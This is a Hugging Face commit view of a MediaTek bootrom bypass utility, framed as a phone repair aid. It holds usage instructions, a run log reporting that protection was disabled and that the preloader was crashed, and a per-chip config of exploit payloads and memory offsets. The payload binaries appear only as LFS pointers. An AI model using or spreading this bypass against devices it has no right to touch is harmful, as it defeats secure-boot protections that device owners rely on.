Hugging Face's logo

Androidrepairguide
/
mtk-bypass-utility

Model card Files
xet
Community
Androidrepairguide commited on
Commit
49d6718
·
verified ·
1 Parent(s): 8dd7a9d

Upload folder using huggingface_hub

Browse files
This view is limited to 50 files because it contains too many changes.   See raw diff
Files changed (50) hide show
  1. .gitattributes +2 -0
  2. HOW_TO_USE.txt +5 -0
  3. LICENSE +21 -0
  4. README.md +52 -0
  5. UsbDk_1.0.22_x64.msi +3 -0
  6. bypass_utility.log +258 -0
  7. default_config.json5 +216 -0
  8. exploits_collection/README.md +34 -0
  9. exploits_collection/default_config.json5 +216 -0
  10. exploits_collection/payloads/generic_dump_payload.bin +3 -0
  11. exploits_collection/payloads/generic_loader_payload.bin +3 -0
  12. exploits_collection/payloads/generic_reboot_payload.bin +3 -0
  13. exploits_collection/payloads/generic_uart_dump_payload.bin +3 -0
  14. exploits_collection/payloads/mt6261_payload.bin +3 -0
  15. exploits_collection/payloads/mt6572_payload.bin +3 -0
  16. exploits_collection/payloads/mt6580_payload.bin +3 -0
  17. exploits_collection/payloads/mt6582_payload.bin +3 -0
  18. exploits_collection/payloads/mt6592_payload.bin +3 -0
  19. exploits_collection/payloads/mt6595_payload.bin +3 -0
  20. exploits_collection/payloads/mt6735_payload.bin +3 -0
  21. exploits_collection/payloads/mt6737_payload.bin +3 -0
  22. exploits_collection/payloads/mt6739_payload.bin +3 -0
  23. exploits_collection/payloads/mt6750_payload.bin +3 -0
  24. exploits_collection/payloads/mt6753_payload.bin +3 -0
  25. exploits_collection/payloads/mt6755_payload.bin +3 -0
  26. exploits_collection/payloads/mt6757_payload.bin +3 -0
  27. exploits_collection/payloads/mt6761_payload.bin +3 -0
  28. exploits_collection/payloads/mt6763_payload.bin +3 -0
  29. exploits_collection/payloads/mt6765_payload.bin +3 -0
  30. exploits_collection/payloads/mt6768_payload.bin +3 -0
  31. exploits_collection/payloads/mt6771_payload.bin +3 -0
  32. exploits_collection/payloads/mt6779_payload.bin +3 -0
  33. exploits_collection/payloads/mt6785_payload.bin +3 -0
  34. exploits_collection/payloads/mt6795_payload.bin +3 -0
  35. exploits_collection/payloads/mt6797_payload.bin +3 -0
  36. exploits_collection/payloads/mt6799_payload.bin +3 -0
  37. exploits_collection/payloads/mt6833_payload.bin +3 -0
  38. exploits_collection/payloads/mt6853_payload.bin +3 -0
  39. exploits_collection/payloads/mt6873_payload.bin +3 -0
  40. exploits_collection/payloads/mt6885_payload.bin +3 -0
  41. exploits_collection/payloads/mt8127_payload.bin +3 -0
  42. exploits_collection/payloads/mt8163_payload.bin +3 -0
  43. exploits_collection/payloads/mt8167_payload.bin +3 -0
  44. exploits_collection/payloads/mt8173_payload.bin +3 -0
  45. exploits_collection/payloads/mt8590_payload.bin +3 -0
  46. exploits_collection/payloads/mt8695_payload.bin +3 -0
  47. libusb-1.0.dll +3 -0
  48. main.py +237 -0
  49. mtk-bypass-utility.zip +3 -0
  50. mtk_bypass.bat +1 -0
.gitattributes CHANGED
@@ -33,3 +33,5 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
33
  *.zip filter=lfs diff=lfs merge=lfs -text
34
  *.zst filter=lfs diff=lfs merge=lfs -text
35
  *tfevents* filter=lfs diff=lfs merge=lfs -text
 
 
 
33
  *.zip filter=lfs diff=lfs merge=lfs -text
34
  *.zst filter=lfs diff=lfs merge=lfs -text
35
  *tfevents* filter=lfs diff=lfs merge=lfs -text
36
+ UsbDk_1.0.22_x64.msi filter=lfs diff=lfs merge=lfs -text
37
+ libusb-1.0.dll filter=lfs diff=lfs merge=lfs -text
HOW_TO_USE.txt ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
+ 1. Install python
2
+ 2. Install UsbDk (64-bit)
3
+ 3. Run `pip install pyusb==1.1.1 json5`
4
+ 4. Run `python main.py'
5
+ 5. Power off device & connect via usb in BROM Mode(https://androidrepairguide.blogspot.com/2025/04/connect-mediatek-device-in-brom-mode.html)
LICENSE ADDED
@@ -0,0 +1,21 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ MIT License
2
+
3
+ Copyright (c) 2021 Dinolek
4
+
5
+ Permission is hereby granted, free of charge, to any person obtaining a copy
6
+ of this software and associated documentation files (the "Software"), to deal
7
+ in the Software without restriction, including without limitation the rights
8
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9
+ copies of the Software, and to permit persons to whom the Software is
10
+ furnished to do so, subject to the following conditions:
11
+
12
+ The above copyright notice and this permission notice shall be included in all
13
+ copies or substantial portions of the Software.
14
+
15
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19
+ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20
+ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21
+ SOFTWARE.
README.md ADDED
@@ -0,0 +1,52 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Mediatek Bypass utility
2
+
3
+ > Personally tested on `Infinix Hot 10 Play X688B`
4
+
5
+ Small utility to disable bootrom protection(sla and daa) on Mediatek devices
6
+
7
+ ## Usage on Windows
8
+
9
+ Skip steps 1-3 after first usage
10
+
11
+ 1. Install [python (64-bit)](https://www.python.org/downloads)(select "Add Python X.X to PATH")
12
+ 2. Install [UsbDk (64-bit)](https://github.com/daynix/UsbDk/releases)
13
+ 3. Install pyusb, json5 with command:
14
+
15
+ ```
16
+ pip install pyusb==1.1.1 json5
17
+ ```
18
+
19
+ 4. Run this command and connect your powered off phone with volume+ button, you should get "Protection disabled" at the end
20
+
21
+ ```
22
+ python main.py
23
+ ```
24
+
25
+ 5. After that, without disconnecting phone, run SP Flash Tool
26
+
27
+ ## Usage on Linux
28
+
29
+ Skip steps 1-2 after first usage
30
+ To use kamakiri you need [FireISO](https://github.com/amonet-kamakiri/fireiso/releases) or [this patch](https://github.com/amonet-kamakiri/kamakiri/blob/master/kernel.patch) for your kernel
31
+
32
+ Prebuilt kernels for various distros are available [here](https://github.com/amonet-kamakiri/prebuilt-kernels)
33
+
34
+ 1. Install python
35
+ 2. Install pyusb, json5 as root with command:
36
+
37
+ ```
38
+ pip install pyusb json5
39
+ ```
40
+
41
+ 3. Run this command as root and connect your powered off phone with volume+ button, you should get "Protection disabled" at the end
42
+
43
+ ```
44
+ ./main.py
45
+ ```
46
+
47
+ 4. After that, without disconnecting phone, run SP Flash Tool in UART Connection mode
48
+
49
+ ## Credits
50
+
51
+ - [@chaosmaster](https://github.com/chaosmaster)
52
+ - [@xyzz](https://github.com/xyzz)
UsbDk_1.0.22_x64.msi ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:91f6f695e1e13c656024e6d3b55620bf08d8835ef05ee0496935ba6bb62466a5
3
+ size 6348800
bypass_utility.log ADDED
@@ -0,0 +1,258 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ [2025-03-30 18:55:40.163719] Waiting for device
2
+ [2025-03-30 18:55:52.424270] Found device = 0e8d:0003
3
+ [2025-03-30 18:55:52.650426] Device hw code: 0x766
4
+ [2025-03-30 18:55:52.650426] Device hw sub code: 0x8a00
5
+ [2025-03-30 18:55:52.651427] Device hw version: 0xca00
6
+ [2025-03-30 18:55:52.651427] Device sw version: 0x0
7
+ [2025-03-30 18:55:52.652427] Device secure boot: True
8
+ [2025-03-30 18:55:52.653429] Device serial link authorization: False
9
+ [2025-03-30 18:55:52.653429] Device download agent authorization: True
10
+ [2025-03-30 18:55:52.654428] Disabling watchdog timer
11
+ [2025-03-30 18:55:52.656534] Disabling protection
12
+ [2025-03-30 18:55:52.684046] Protection disabled
13
+ [2025-03-30 18:59:45.675191] Waiting for device
14
+ [2025-03-30 19:00:05.607088] Found device = 0e8d:0003
15
+ [2025-03-30 19:00:05.838795] Device hw code: 0x766
16
+ [2025-03-30 19:00:05.839797] Device hw sub code: 0x8a00
17
+ [2025-03-30 19:00:05.839797] Device hw version: 0xca00
18
+ [2025-03-30 19:00:05.840798] Device sw version: 0x0
19
+ [2025-03-30 19:00:05.841799] Device secure boot: True
20
+ [2025-03-30 19:00:05.842799] Device serial link authorization: False
21
+ [2025-03-30 19:00:05.843798] Device download agent authorization: True
22
+ [2025-03-30 19:00:05.844797] Disabling watchdog timer
23
+ [2025-03-30 19:00:05.846797] Disabling protection
24
+ [2025-03-30 19:00:05.874968] Protection disabled
25
+ [2025-03-30 19:06:55.042281] Waiting for device
26
+ [2025-03-30 19:07:02.741112] Found device = 0e8d:0003
27
+ [2025-03-30 19:07:02.963512] Device hw code: 0x766
28
+ [2025-03-30 19:07:02.964513] Device hw sub code: 0x8a00
29
+ [2025-03-30 19:07:02.965513] Device hw version: 0xca00
30
+ [2025-03-30 19:07:02.965513] Device sw version: 0x0
31
+ [2025-03-30 19:07:02.966513] Device secure boot: True
32
+ [2025-03-30 19:07:02.967514] Device serial link authorization: False
33
+ [2025-03-30 19:07:02.967514] Device download agent authorization: True
34
+ [2025-03-30 19:07:02.968514] Disabling watchdog timer
35
+ [2025-03-30 19:07:02.970879] Disabling protection
36
+ [2025-03-30 19:07:02.999589] Protection disabled
37
+ [2025-03-30 19:24:07.022011] Waiting for device
38
+ [2025-03-30 19:24:45.045941] Found device = 0e8d:0003
39
+ [2025-03-30 19:24:45.292066] Device hw code: 0x766
40
+ [2025-03-30 19:24:45.292066] Device hw sub code: 0x8a00
41
+ [2025-03-30 19:24:45.293068] Device hw version: 0xca00
42
+ [2025-03-30 19:24:45.295068] Device sw version: 0x0
43
+ [2025-03-30 19:24:45.296067] Device secure boot: True
44
+ [2025-03-30 19:24:45.296067] Device serial link authorization: False
45
+ [2025-03-30 19:24:45.297067] Device download agent authorization: True
46
+ [2025-03-30 19:24:45.298068] Disabling watchdog timer
47
+ [2025-03-30 19:24:45.300067] Disabling protection
48
+ [2025-03-30 19:24:45.331068] Protection disabled
49
+ [2025-03-30 14:27:17.677816] Waiting for device
50
+ [2025-03-30 14:28:01.724914] Found device = 0e8d:0003
51
+ [2025-03-30 14:28:01.972474] Device hw code: 0x766
52
+ [2025-03-30 14:28:01.972474] Device hw sub code: 0x8a00
53
+ [2025-03-30 14:28:01.973473] Device hw version: 0xca00
54
+ [2025-03-30 14:28:01.973473] Device sw version: 0x0
55
+ [2025-03-30 14:28:01.974474] Device secure boot: True
56
+ [2025-03-30 14:28:01.974474] Device serial link authorization: False
57
+ [2025-03-30 14:28:01.975473] Device download agent authorization: True
58
+ [2025-03-30 14:28:01.976475] Disabling watchdog timer
59
+ [2025-03-30 14:28:01.978241] Disabling protection
60
+ [2025-03-30 14:28:01.989243] Using kamakiri
61
+ [2025-03-30 14:28:01.999445] Protection disabled
62
+ [2025-03-30 14:31:17.857838] Waiting for device
63
+ [2025-03-30 14:31:26.788119] Found device = 0e8d:0003
64
+ [2025-03-30 14:31:27.015928] Device hw code: 0x766
65
+ [2025-03-30 14:31:27.016928] Device hw sub code: 0x8a00
66
+ [2025-03-30 14:31:27.016928] Device hw version: 0xca00
67
+ [2025-03-30 14:31:27.017929] Device sw version: 0x0
68
+ [2025-03-30 14:31:27.018927] Device secure boot: True
69
+ [2025-03-30 14:31:27.018927] Device serial link authorization: False
70
+ [2025-03-30 14:31:27.019928] Device download agent authorization: True
71
+ [2025-03-30 14:31:27.019928] Disabling watchdog timer
72
+ [2025-03-30 14:31:27.021927] Disabling protection
73
+ [2025-03-30 14:31:27.022929] Using kamakiri
74
+ [2025-03-30 14:31:27.034260] Protection disabled
75
+ [2025-03-30 15:00:38.624821] Waiting for device
76
+ [2025-03-30 15:00:49.075305] Found device = 0e8d:0003
77
+ [2025-03-30 15:00:49.301589] Device hw code: 0x766
78
+ [2025-03-30 15:00:49.302589] Device hw sub code: 0x8a00
79
+ [2025-03-30 15:00:49.303590] Device hw version: 0xca00
80
+ [2025-03-30 15:00:49.303590] Device sw version: 0x0
81
+ [2025-03-30 15:00:49.304589] Device secure boot: True
82
+ [2025-03-30 15:00:49.304589] Device serial link authorization: False
83
+ [2025-03-30 15:00:49.305590] Device download agent authorization: True
84
+ [2025-03-30 15:00:49.306591] Disabling watchdog timer
85
+ [2025-03-30 15:00:49.308590] Disabling protection
86
+ [2025-03-30 15:00:49.310590] Using kamakiri
87
+ [2025-03-30 15:00:49.321530] Protection disabled
88
+ [2025-03-30 15:58:29.967337] Waiting for device
89
+ [2025-03-30 15:58:53.410958] Found device = 0e8d:0003
90
+ [2025-03-30 15:58:53.710266] Device hw code: 0x766
91
+ [2025-03-30 15:58:53.711267] Device hw sub code: 0x8a00
92
+ [2025-03-30 15:58:53.711267] Device hw version: 0xca00
93
+ [2025-03-30 15:58:53.712267] Device sw version: 0x0
94
+ [2025-03-30 15:58:53.712267] Device secure boot: True
95
+ [2025-03-30 15:58:53.713267] Device serial link authorization: False
96
+ [2025-03-30 15:58:53.714266] Device download agent authorization: True
97
+ [2025-03-30 15:58:53.715266] Disabling watchdog timer
98
+ [2025-03-30 15:58:53.717291] Disabling protection
99
+ [2025-03-30 15:58:53.749015] Protection disabled
100
+ [2025-03-30 16:03:40.629448] Waiting for device
101
+ [2025-03-30 16:03:47.032978] Found device = 0e8d:0003
102
+ [2025-03-30 16:03:47.302838] Device hw code: 0x766
103
+ [2025-03-30 16:03:47.303838] Device hw sub code: 0x8a00
104
+ [2025-03-30 16:03:47.304839] Device hw version: 0xca00
105
+ [2025-03-30 16:03:47.305839] Device sw version: 0x0
106
+ [2025-03-30 16:03:47.306840] Device secure boot: True
107
+ [2025-03-30 16:03:47.307842] Device serial link authorization: False
108
+ [2025-03-30 16:03:47.308840] Device download agent authorization: True
109
+ [2025-03-30 16:03:47.308840] Disabling watchdog timer
110
+ [2025-03-30 16:03:47.311839] Disabling protection
111
+ [2025-03-30 16:03:47.342886] Protection disabled
112
+ [2025-03-30 16:04:19.031387] Waiting for device
113
+ [2025-03-30 16:04:36.829544] Found device = 0e8d:0003
114
+ [2025-03-30 16:04:37.098365] Device hw code: 0x766
115
+ [2025-03-30 16:04:37.098365] Device hw sub code: 0x8a00
116
+ [2025-03-30 16:04:37.099366] Device hw version: 0xca00
117
+ [2025-03-30 16:04:37.100366] Device sw version: 0x0
118
+ [2025-03-30 16:04:37.100366] Device secure boot: True
119
+ [2025-03-30 16:04:37.101367] Device serial link authorization: False
120
+ [2025-03-30 16:04:37.102367] Device download agent authorization: True
121
+ [2025-03-30 16:04:37.102367] Disabling watchdog timer
122
+ [2025-03-30 16:04:37.105274] Disabling protection
123
+ [2025-03-30 16:04:37.177177] Protection disabled
124
+ [2025-03-30 16:24:47.810791] Waiting for device
125
+ [2025-03-30 16:26:05.907340] Found device = 0e8d:2000
126
+ [2025-03-30 16:26:17.839154] Device hw code: 0x766
127
+ [2025-03-30 16:26:17.839154] Device hw sub code: 0x8a00
128
+ [2025-03-30 16:26:17.840160] Device hw version: 0xca00
129
+ [2025-03-30 16:26:17.841157] Device sw version: 0x0
130
+ [2025-03-30 16:26:17.842157] Device secure boot: True
131
+ [2025-03-30 16:26:17.843157] Device serial link authorization: False
132
+ [2025-03-30 16:26:17.843157] Device download agent authorization: True
133
+ [2025-03-30 16:26:17.845157] Found device in preloader mode, trying to crash...
134
+ [2025-03-30 16:26:17.847157] status is 7024
135
+ [2025-03-30 16:26:18.854501] Waiting for device
136
+ [2025-03-30 16:26:18.856501] Found device = 0e8d:0003
137
+ [2025-03-30 16:26:19.119788] Device hw code: 0x766
138
+ [2025-03-30 16:26:19.119788] Device hw sub code: 0x8a00
139
+ [2025-03-30 16:26:19.121053] Device hw version: 0xca00
140
+ [2025-03-30 16:26:19.122054] Device sw version: 0x0
141
+ [2025-03-30 16:26:19.122054] Device secure boot: True
142
+ [2025-03-30 16:26:19.123055] Device serial link authorization: False
143
+ [2025-03-30 16:26:19.124054] Device download agent authorization: True
144
+ [2025-03-30 16:26:19.124054] Disabling watchdog timer
145
+ [2025-03-30 16:26:19.126714] Disabling protection
146
+ [2025-03-30 16:26:19.156884] Protection disabled
147
+ [2025-03-30 16:28:14.415118] Waiting for device
148
+ [2025-03-30 16:28:14.417119] Found device = 0e8d:0003
149
+ [2025-03-30 16:28:14.684816] Device hw code: 0x766
150
+ [2025-03-30 16:28:14.685815] Device hw sub code: 0x8a00
151
+ [2025-03-30 16:28:14.686816] Device hw version: 0xca00
152
+ [2025-03-30 16:28:14.686816] Device sw version: 0x0
153
+ [2025-03-30 16:28:14.687816] Device secure boot: False
154
+ [2025-03-30 16:28:14.687816] Device serial link authorization: False
155
+ [2025-03-30 16:28:14.688817] Device download agent authorization: False
156
+ [2025-03-30 16:28:14.689818] Disabling watchdog timer
157
+ [2025-03-30 16:28:14.692135] Insecure device, sending payload using send_da
158
+ [2025-03-30 16:28:14.748482] Found send_dword, dumping bootrom to bootrom_766.bin
159
+ [2025-03-30 16:29:05.907328] Waiting for device
160
+ [2025-03-30 16:29:09.219474] Found device = 0e8d:2000
161
+ [2025-03-30 16:29:20.608828] Device hw code: 0x766
162
+ [2025-03-30 16:29:20.609829] Device hw sub code: 0x8a00
163
+ [2025-03-30 16:29:20.610816] Device hw version: 0xca00
164
+ [2025-03-30 16:29:20.610816] Device sw version: 0x0
165
+ [2025-03-30 16:29:20.612815] Device secure boot: True
166
+ [2025-03-30 16:29:20.613815] Device serial link authorization: False
167
+ [2025-03-30 16:29:20.613815] Device download agent authorization: True
168
+ [2025-03-30 16:29:20.614831] Found device in preloader mode, trying to crash...
169
+ [2025-03-30 16:29:20.617909] status is 7024
170
+ [2025-03-30 16:29:21.620024] Waiting for device
171
+ [2025-03-30 16:29:21.622036] Found device = 0e8d:0003
172
+ [2025-03-30 16:29:21.867785] Device hw code: 0x766
173
+ [2025-03-30 16:29:21.868785] Device hw sub code: 0x8a00
174
+ [2025-03-30 16:29:21.868785] Device hw version: 0xca00
175
+ [2025-03-30 16:29:21.869786] Device sw version: 0x0
176
+ [2025-03-30 16:29:21.869786] Device secure boot: True
177
+ [2025-03-30 16:29:21.870786] Device serial link authorization: False
178
+ [2025-03-30 16:29:21.871787] Device download agent authorization: True
179
+ [2025-03-30 16:29:21.872791] Disabling watchdog timer
180
+ [2025-03-30 16:29:21.875154] Disabling protection
181
+ [2025-03-30 16:29:21.905106] Protection disabled
182
+ [2025-03-30 16:48:01.676685] Waiting for device
183
+ [2025-03-30 16:48:01.677686] Found device = 0e8d:2000
184
+ [2025-03-30 16:48:13.037939] Device hw code: 0x766
185
+ [2025-03-30 16:48:13.037939] Device hw sub code: 0x8a00
186
+ [2025-03-30 16:48:13.038942] Device hw version: 0xca00
187
+ [2025-03-30 16:48:13.039941] Device sw version: 0x0
188
+ [2025-03-30 16:48:13.039941] Device secure boot: True
189
+ [2025-03-30 16:48:13.040941] Device serial link authorization: False
190
+ [2025-03-30 16:48:13.042941] Device download agent authorization: True
191
+ [2025-03-30 16:48:13.043942] Found device in preloader mode, trying to crash...
192
+ [2025-03-30 16:48:13.047942] status is 7024
193
+ [2025-03-30 16:48:14.057950] Waiting for device
194
+ [2025-03-30 16:48:14.058950] Found device = 0e8d:0003
195
+ [2025-03-30 16:48:14.320814] Device hw code: 0x766
196
+ [2025-03-30 16:48:14.321814] Device hw sub code: 0x8a00
197
+ [2025-03-30 16:48:14.322814] Device hw version: 0xca00
198
+ [2025-03-30 16:48:14.322814] Device sw version: 0x0
199
+ [2025-03-30 16:48:14.323814] Device secure boot: True
200
+ [2025-03-30 16:48:14.325324] Device serial link authorization: False
201
+ [2025-03-30 16:48:14.327346] Device download agent authorization: True
202
+ [2025-03-30 16:48:14.328346] Disabling watchdog timer
203
+ [2025-03-30 16:48:14.330887] Disabling protection
204
+ [2025-03-30 16:48:14.363226] Protection disabled
205
+ [2025-03-30 16:50:45.192561] Waiting for device
206
+ [2025-03-30 16:51:25.446559] Found device = 0e8d:2000
207
+ [2025-03-30 16:51:37.474047] Device hw code: 0x766
208
+ [2025-03-30 16:51:37.475048] Device hw sub code: 0x8a00
209
+ [2025-03-30 16:51:37.476050] Device hw version: 0xca00
210
+ [2025-03-30 16:51:37.477048] Device sw version: 0x0
211
+ [2025-03-30 16:51:37.477048] Device secure boot: True
212
+ [2025-03-30 16:51:37.478050] Device serial link authorization: False
213
+ [2025-03-30 16:51:37.479049] Device download agent authorization: True
214
+ [2025-03-30 16:51:37.480049] Found device in preloader mode, trying to crash...
215
+ [2025-03-30 16:51:37.482048] status is 7024
216
+ [2025-03-30 16:51:38.490922] Waiting for device
217
+ [2025-03-30 16:51:38.492932] Found device = 0e8d:0003
218
+ [2025-03-30 16:51:38.703067] Device hw code: 0x766
219
+ [2025-03-30 16:51:38.704575] Device hw sub code: 0x8a00
220
+ [2025-03-30 16:51:38.704575] Device hw version: 0xca00
221
+ [2025-03-30 16:51:38.706006] Device sw version: 0x0
222
+ [2025-03-30 16:51:38.707006] Device secure boot: True
223
+ [2025-03-30 16:51:38.708007] Device serial link authorization: False
224
+ [2025-03-30 16:51:38.709010] Device download agent authorization: True
225
+ [2025-03-30 16:51:38.709010] Disabling watchdog timer
226
+ [2025-03-30 16:51:38.711008] Disabling protection
227
+ [2025-03-30 16:51:38.741665] Protection disabled
228
+ [2025-03-30 17:29:04.508432] Waiting for device
229
+ [2025-03-30 17:29:25.433937] Found device = 0e8d:2000
230
+ [2025-03-30 17:29:36.976516] Device hw code: 0x766
231
+ [2025-03-30 17:29:36.977516] Device hw sub code: 0x8a00
232
+ [2025-03-30 17:29:36.978517] Device hw version: 0xca00
233
+ [2025-03-30 17:29:36.979518] Device sw version: 0x0
234
+ [2025-03-30 17:29:36.982520] Device secure boot: True
235
+ [2025-03-30 17:29:36.982520] Device serial link authorization: False
236
+ [2025-03-30 17:29:36.983517] Device download agent authorization: True
237
+ [2025-03-30 17:29:36.984519] Found device in preloader mode, trying to crash...
238
+ [2025-03-30 17:29:36.987517] status is 7024
239
+ [2025-03-30 17:29:37.998632] Waiting for device
240
+ [2025-03-30 17:29:38.000634] Found device = 0e8d:0003
241
+ [2025-03-30 17:29:38.267953] Device hw code: 0x766
242
+ [2025-03-30 17:29:38.267953] Device hw sub code: 0x8a00
243
+ [2025-03-30 17:29:38.269465] Device hw version: 0xca00
244
+ [2025-03-30 17:29:38.269465] Device sw version: 0x0
245
+ [2025-03-30 17:29:38.271801] Device secure boot: True
246
+ [2025-03-30 17:29:38.271801] Device serial link authorization: False
247
+ [2025-03-30 17:29:38.272799] Device download agent authorization: True
248
+ [2025-03-30 17:29:38.273802] Disabling watchdog timer
249
+ [2025-03-30 17:29:38.275799] Disabling protection
250
+ [2025-03-30 17:29:38.308307] Protection disabled
251
+ [2025-03-31 11:21:37.435686] Waiting for device
252
+ [2025-03-31 11:22:51.706012] Waiting for device
253
+ [2025-03-31 18:00:48.057530] Waiting for device
254
+ [2025-03-31 18:01:03.802597] Found device = 0e8d:2000
255
+ [2025-04-17 14:51:05.202982] Waiting for device
256
+ [2025-04-17 14:53:10.254121] Waiting for device
257
+ [2025-04-17 14:54:45.863924] Waiting for device
258
+ [2025-04-17 14:55:22.032165] Waiting for device
default_config.json5 ADDED
@@ -0,0 +1,216 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "0x6261": { // mt6261
3
+ "payload": "mt6261_payload.bin",
4
+ "var_1": 0x28,
5
+ "watchdog_address": 0xA0030000,
6
+ },
7
+
8
+ "0x6572": { // mt6572
9
+ "payload": "mt6572_payload.bin",
10
+ "payload_address": 0x10036A0,
11
+ "ptr_usbdl": 0x40ba68,
12
+ "ptr_da": 0x40befc,
13
+ },
14
+
15
+ "0x6580": { // mt6580
16
+ "payload": "mt6580_payload.bin",
17
+ "var_1": 0xAC,
18
+ "ptr_usbdl": 0xb60c,
19
+ "ptr_da": 0xba94,
20
+ },
21
+
22
+ "0x6582": { // mt6582
23
+ "payload": "mt6582_payload.bin",
24
+ "ptr_usbdl": 0xa5fc,
25
+ "ptr_da": 0xaa84,
26
+ },
27
+
28
+ "0x6592": { // mt6592
29
+ "payload": "mt6592_payload.bin",
30
+ "ptr_usbdl": 0xa564,
31
+ "ptr_da": 0xa9ec,
32
+ },
33
+
34
+ "0x6595": { // mt6595
35
+ "payload": "mt6595_payload.bin",
36
+ "ptr_usbdl": 0xb218,
37
+ "ptr_da": 0xb6a0,
38
+ },
39
+
40
+ "0x321": { // mt6735
41
+ "watchdog_address": 0x10212000,
42
+ "var_0": 0x10,
43
+ "var_1": 0x28,
44
+ "payload": "mt6735_payload.bin",
45
+ "ptr_usbdl": 0x95f8,
46
+ "ptr_da": 0x9a94,
47
+ },
48
+
49
+ "0x335": { // mt6737
50
+ "watchdog_address": 0x10212000,
51
+ "var_0": 0x10,
52
+ "var_1": 0x28,
53
+ "payload": "mt6737_payload.bin",
54
+ "ptr_usbdl": 0x9608,
55
+ "ptr_da": 0x9aa4,
56
+ },
57
+
58
+ "0x699": { // mt6739
59
+ "var_0": 0x20,
60
+ "var_1": 0xB4,
61
+ "payload": "mt6739_payload.bin",
62
+ "ptr_usbdl": 0xdf1c,
63
+ "ptr_da": 0xe3e8,
64
+ },
65
+
66
+ "0x337": { // mt6753
67
+ "watchdog_address": 0x10212000,
68
+ "var_1": 0x28,
69
+ "payload": "mt6753_payload.bin",
70
+ "ptr_usbdl": 0x9668,
71
+ "ptr_da": 0x9b04,
72
+ },
73
+
74
+ "0x326": { // mt6755
75
+ "payload": "mt6755_payload.bin",
76
+ "ptr_usbdl": 0x9a6c,
77
+ "ptr_da": 0x9f14,
78
+ },
79
+
80
+ "0x551": { // mt6757
81
+ "payload": "mt6757_payload.bin",
82
+ "ptr_usbdl": 0x9c2c,
83
+ "ptr_da": 0xa0e8,
84
+ },
85
+
86
+ "0x717": { // mt6761
87
+ "var_1": 0x25,
88
+ "payload": "mt6761_payload.bin",
89
+ "ptr_usbdl": 0xbc8c,
90
+ "ptr_da": 0xc158,
91
+ },
92
+
93
+ "0x690": { // mt6763
94
+ "var_1": 0x7F,
95
+ "payload": "mt6763_payload.bin",
96
+ "ptr_usbdl": 0xd66c,
97
+ "ptr_da": 0xdb38,
98
+ },
99
+
100
+ "0x766": { // mt6765
101
+ "var_0": 0x2C,
102
+ "var_1": 0x25,
103
+ "payload": "mt6765_payload.bin",
104
+ "ptr_usbdl": 0xbdc0,
105
+ "ptr_da": 0xc28c
106
+ },
107
+
108
+ "0x707": { // mt6768
109
+ "var_0": 0x2C,
110
+ "var_1": 0x25,
111
+ "payload": "mt6768_payload.bin",
112
+ "ptr_usbdl": 0xc190,
113
+ "ptr_da": 0xc650,
114
+ },
115
+
116
+ "0x788": { // mt6771
117
+ "var_0": 0x20,
118
+ "payload": "mt6771_payload.bin",
119
+ "ptr_usbdl": 0xdebc,
120
+ "ptr_da": 0xe388,
121
+ },
122
+
123
+ "0x725": { // mt6779
124
+ "payload": "mt6779_payload.bin",
125
+ "ptr_usbdl": 0xe04c,
126
+ "ptr_da": 0xe50c,
127
+ },
128
+
129
+ "0x813": { // mt6785
130
+ "payload": "mt6785_payload.bin",
131
+ "ptr_usbdl": 0xe2a4,
132
+ "ptr_da": 0xe764,
133
+ },
134
+
135
+ "0x6795": { // mt6795
136
+ "payload": "mt6795_payload.bin",
137
+ "ptr_usbdl": 0x978c,
138
+ "ptr_da": 0x9c28,
139
+ },
140
+
141
+ "0x279": { // mt6797
142
